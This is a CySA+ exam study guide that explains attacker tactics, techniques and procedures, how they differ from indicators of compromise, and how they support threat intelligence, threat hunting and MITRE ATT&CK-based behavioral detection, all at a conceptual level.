1.4 Compare and contrast threat-intelligence and threat-hunting concepts.
📘CompTIA CySA+ (CS0-003)
1. What Are Tactics, Techniques, and Procedures (TTPs)?
TTPs describe how attackers operate.
They explain:
- What the attacker wants to achieve (Tactics)
- How they try to achieve it (Techniques)
- The exact steps or tools they use (Procedures)
Understanding TTPs helps security analysts:
- Detect attacks
- Investigate incidents
- Perform threat hunting
- Improve security controls
- Predict future attacks
For the CySA+ exam, you must clearly understand the difference between tactics, techniques, and procedures, and how they are used in threat intelligence and threat hunting.
2. Tactics
Definition
A tactic is the goal or objective of the attacker during a specific stage of an attack.
It answers the question:
“What is the attacker trying to accomplish right now?”
Tactics describe the high-level purpose of an attack phase.
Common Attacker Tactics
Some common tactics in cybersecurity include:
- Initial access
- Execution
- Persistence
- Privilege escalation
- Defense evasion
- Credential access
- Discovery
- Lateral movement
- Command and control (C2)
- Data exfiltration
- Impact (such as ransomware encryption)
IT Environment Example (Tactic)
If an attacker wants to:
- Gain administrator rights → Privilege escalation (tactic)
- Move from one compromised server to another → Lateral movement (tactic)
- Steal customer database files → Data exfiltration (tactic)
The tactic explains the attacker’s objective, not how they do it.
3. Techniques
Definition
A technique describes how the attacker achieves the tactic.
It answers:
“How does the attacker accomplish this goal?”
Techniques are more detailed than tactics but not as specific as procedures.
Example
If the tactic is:
Tactic: Credential Access
The attacker wants to steal login credentials.
Possible Techniques:
- Keylogging
- Credential dumping from memory
- Phishing emails
- Password spraying
- Brute force attacks
The technique explains the method category, not the exact command or tool used.
IT Environment Example
If attackers want to move laterally (tactic), they might use:
- Remote Desktop Protocol (RDP)
- Pass-the-hash
- SMB file sharing
Each one is a technique used to accomplish the lateral movement tactic.
4. Procedures
Definition
A procedure is the exact step-by-step method or specific tool the attacker uses.
It answers:
“Exactly how did the attacker perform this technique?”
Procedures are very specific and can include:
- Exact commands
- Malware names
- Scripts
- Exploit code
- Configuration changes
Example
If the technique is:
Technique: Credential Dumping
The procedure might be:
- Using a specific tool to dump LSASS memory
- Running a PowerShell command to extract credentials
- Uploading a specific malware file to a server
Procedures are the lowest level of detail in TTPs.
5. Simple Comparison Table
| Level | What It Means | Question It Answers | Example |
|---|---|---|---|
| Tactic | The attacker’s goal | What are they trying to achieve? | Privilege escalation |
| Technique | The method used | How are they doing it? | Exploiting a vulnerable service |
| Procedure | The exact implementation | Exactly how was it done? | Running a specific exploit script |
6. Why TTPs Are Important for CySA+
TTPs are critical in:
- Threat intelligence
- Threat hunting
- Incident response
- Detection engineering
- Building SIEM rules
- Writing playbooks
The CySA+ exam expects you to understand how TTPs help analysts detect and respond to threats.
7. TTPs in Threat Intelligence
What Is Threat Intelligence?
Threat intelligence is the collection and analysis of information about attackers, including:
- Indicators of compromise (IOCs)
- Malware signatures
- IP addresses
- Domains
- Attacker behavior patterns
TTPs are part of behavior-based intelligence.
TTPs vs IOCs
This is very important for the exam.
Indicators of Compromise (IOCs)
- Specific IP address
- Specific file hash
- Specific domain name
These are:
- Easy to detect
- Easy for attackers to change
TTPs
- Describe attacker behavior
- Harder to change
- More long-term intelligence
Example:
Even if an attacker changes:
- IP address
- Malware filename
- Domain
Their behavior pattern (TTP) may stay the same.
That makes TTPs more valuable for long-term defense.
8. TTPs in Threat Hunting
What Is Threat Hunting?
Threat hunting is a proactive search for threats inside a network.
Instead of waiting for alerts, analysts:
- Look for suspicious behavior
- Search logs
- Investigate anomalies
- Test hypotheses
How TTPs Are Used in Threat Hunting
Threat hunters use TTPs to:
- Build hypotheses
Example: “If attackers use credential dumping, there should be abnormal access to LSASS.” - Search logs
- Windows event logs
- Endpoint logs
- Network traffic logs
- Firewall logs
- Detect suspicious behavior
- Unusual PowerShell execution
- Unexpected admin account usage
- Large data transfers
TTPs guide hunters on what to look for.
9. TTPs and the MITRE ATT&CK Framework
The MITRE Corporation developed the:
MITRE ATT&CK
This framework organizes:
- Tactics
- Techniques
- Sub-techniques
It is widely used in:
- Security Operations Centers (SOCs)
- Threat intelligence platforms
- Detection engineering
- Incident response teams
How MITRE ATT&CK Relates to TTPs
MITRE ATT&CK:
- Lists attacker tactics (e.g., Persistence)
- Lists techniques under each tactic
- Provides detection guidance
For the CySA+ exam, understand that:
MITRE ATT&CK is a knowledge base of attacker TTPs.
10. Behavioral Detection vs Signature Detection
Understanding this difference is very important for CySA+.
Signature-Based Detection
- Looks for known file hashes
- Looks for known malware names
- Based on IOCs
Weakness:
- Easily bypassed if attacker changes file name or hash.
Behavior-Based Detection
- Looks at TTPs
- Detects abnormal actions
- Detects suspicious system behavior
Example:
- A standard user account accessing domain controller memory
- A service account launching interactive shells
- Large data transfer to unknown external IP
Behavior detection is based on TTPs and is stronger for modern threats.
11. TTPs and Advanced Persistent Threats (APT)
Advanced attackers often:
- Reuse similar TTP patterns
- Follow similar attack chains
- Use consistent operational behavior
Even if tools change, their TTPs may remain similar.
Security analysts can:
- Attribute attacks
- Identify likely attacker groups
- Strengthen defenses
12. TTP Lifecycle in an IT Environment
In a typical enterprise network:
- Initial Access (Tactic)
Technique: Phishing
Procedure: Sending malicious document via email - Execution (Tactic)
Technique: PowerShell abuse
Procedure: Running encoded PowerShell command - Credential Access (Tactic)
Technique: Memory dumping
Procedure: Extracting credentials from LSASS - Lateral Movement (Tactic)
Technique: RDP
Procedure: Using stolen admin credentials over RDP - Exfiltration (Tactic)
Technique: Data transfer over HTTPS
Procedure: Uploading archive file to external server
This shows how tactics, techniques, and procedures connect together.
13. Exam Key Points (Very Important)
For the CySA+ exam, remember:
✅ Tactic = attacker goal
✅ Technique = method used
✅ Procedure = exact implementation
✅ TTPs describe behavior
✅ TTPs are harder to change than IOCs
✅ Threat intelligence uses TTPs to understand attackers
✅ Threat hunting uses TTPs to proactively search for threats
✅ MITRE ATT&CK organizes TTPs
✅ Behavior-based detection focuses on TTPs
✅ TTP analysis improves long-term defense
14. Common Exam Traps
Be careful not to confuse:
- IOC with TTP
- Technique with tactic
- Procedure with technique
- Signature-based detection with behavioral detection
If a question mentions:
- Specific IP address → IOC
- Attack goal → Tactic
- General method → Technique
- Specific command or tool → Procedure
15. Final Summary (Simple Version)
Think of TTPs like this:
- Tactic = The attacker’s goal
- Technique = The method used
- Procedure = The exact steps taken
TTPs are important because they:
- Help detect modern attacks
- Support threat hunting
- Improve incident response
- Provide long-term defense strategies
- Are organized in the MITRE ATT&CK framework
